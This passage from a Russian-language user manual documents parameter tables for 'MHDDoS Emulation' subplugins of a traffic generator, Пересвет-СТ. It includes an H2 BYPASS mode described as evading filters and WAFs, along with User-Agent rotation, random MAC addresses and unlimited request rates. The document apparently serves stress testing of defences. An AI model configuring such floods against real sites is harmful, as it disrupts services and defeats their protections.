ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 137;

Табл. 137 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 138;

Табл. 138 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 139;

Табл. 139 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером Параметр доступен, если параметр HTTPs включенвыберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.По умолчанию, задано значение HTTP 1.1
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.По умолчанию, задано значение «GET»
HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Значения по умолчанию: «Accept»:« */*»; «Accept-Encoding»:« gzip,deflate,br»; «Accept-Language»:«ru-RU,ru;q=0.9,en-US,en;q=0.7»; «Cache-Control»:«max-age=0»; «Sec-Fetch-Mode»:«navigate»; «Sec-Fetch-Site»:«same-origin»; «Sec-Fetch-User»:«71»; «Sec-Fetch-Dest»:«document»; «Pragma»:«no-cache»; Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 140;

Табл. 140 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение Значение по умолчанию: «10»
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение Значение по умолчанию: «0»
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение Значение по умолчанию: «1»
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение Значение по умолчанию: «10»

H2 BYPASS

H2 BYPASS – подплагин для генерации трафика, направленный на обход стандартных мер защиты (например, фильтров или WAF), используя протокол HTTP 2.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 141;

Табл. 141 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 142;

Табл. 142 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 143;

Табл. 143 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 144;

Табл. 144 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 145;

Табл. 145 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером Параметр доступен, если параметр HTTPs включенвыберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.По умолчанию, задано значение HTTP 2
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.По умолчанию, задано значение «GET»
HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Значения по умолчанию: «Accept»:« */*»; «Accept-Encoding»:« gzip,deflate,br»; «Accept-Language»:«ru-RU,ru;q=0.9,en-US,en;q=0.7»; «Cache-Control»:«max-age=0»; «Sec-Fetch-Mode»:«navigate»; «Sec-Fetch-Site»:«same-origin»; «Sec-Fetch-User»:«71»; «Sec-Fetch-Dest»:«document»; «Pragma»:«no-cache»; Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 146;

Табл. 146 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение Значение по умолчанию: «10»
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение Значение по умолчанию: «0»
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение Значение по умолчанию: «1»
Макс. стримов (на сессию)Максимальное количество потоков данных, которые могут быть активны в одной сессии. Параметр доступен только при включении H2 в «Параметрах HTTP».Задайте числовое значение Значение по умолчанию: «20»
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение Значение по умолчанию: «10»

HTTP TEMPLATE

HTTP TEMPLATE – подплагин для генерации трафика, направленный на генерацию HTTP-запросов по заданному шаблону для имитации легитимного или вредоносного трафика.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 147;

Табл. 147 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 148;

Табл. 148 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 149;

Табл. 149 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 150;

Табл. 150 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 151;

Табл. 151 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером Параметр доступен, если параметр HTTPs включенвыберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.По умолчанию, задано значение HTTP 1.1
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.выберите из следующего списка: GET POST PUT PATCH DELETE
HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
Тело запросаЧасть HTTP-запроса, содержащая данные, которые клиент отправляет серверу (например, форму или JSON) Параметр доступен если выбраны методы: POST, PUT или PATCHЗаполните поле «тело запроса» следующим образом: Введите значение тело запроса ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Значения по умолчанию: «Accept»:« */*»; «Accept-Encoding»:« gzip,deflate,br»; «Accept-Language»:«ru-RU,ru;q=0.9,en-US,en;q=0.7»; «Cache-Control»:«max-age=0»; «Sec-Fetch-Mode»:«navigate»; «Sec-Fetch-Site»:«same-origin»; «Sec-Fetch-User»:«71»; «Sec-Fetch-Dest»:«document»; «Pragma»:«no-cache»; Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 152;

Табл. 152 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение Значение по умолчанию: «10»
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение Значение по умолчанию: «0»
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение Значение по умолчанию: «1»
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить По умолчанию, тумблер включен.
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение По умолчанию выставлено значение: 10.
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение Значение по умолчанию: «0»

H2 HTTP TEMPLATE

H2 HTTP TEMPLATE – подплагин для генерации трафика, направленный на генерацию HTTP-запросов по заданному шаблону для имитации легитимного или вредоносного трафика, используя протокол HTTP 2.

Данный плагин состоит из следующих параметров:

  1. Тумблер «Активировать подплагин» - для включения подплагина в рамках плагина «MHDDoS Emulation».

  2. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 153;

Табл. 153 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес отправителя
  1. Цели – параметры для выбора объекта, в который будет направляться трафик (см. раздел «Добавление сети типа «получателя»), описание которых указаны в Табл. 154;

Табл. 154 – Параметры «Цели»

НазваниеОписаниеЗначение
MAC-адресВыбранные объект «MAC-адрес» (см. раздел «MAC-адрес») параметры которого будут использоваться для отправки трафикавыберите объект «MAC-адрес» из списка объектов. Случайный MAC-адрес – для каждого пакета будет сгенерирован случайный MAC-адрес получателя.
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) – параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 155;

Табл. 155 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
Случайный IDУникальный идентификатор пакета, выбранный случайным образом для различения фрагментов одного и того же IP-пакетаВключить/выключить тумблер
Значение IDЧисловой идентификатор, присвоенный каждому IP-пакету для его идентификации при фрагментации и сборке Параметр доступен, если параметр «Случайный ID» выключенЗадайте числовое значение (по умолчанию, значение «Значение ID» является: «0-65535»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 156;

Табл. 156 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 157;

Табл. 157 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером Параметр доступен, если параметр HTTPs включенвыберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.По умолчанию, задано значение HTTP 2
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.выберите из следующего списка: GET POST PUT PATCH DELETE
HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
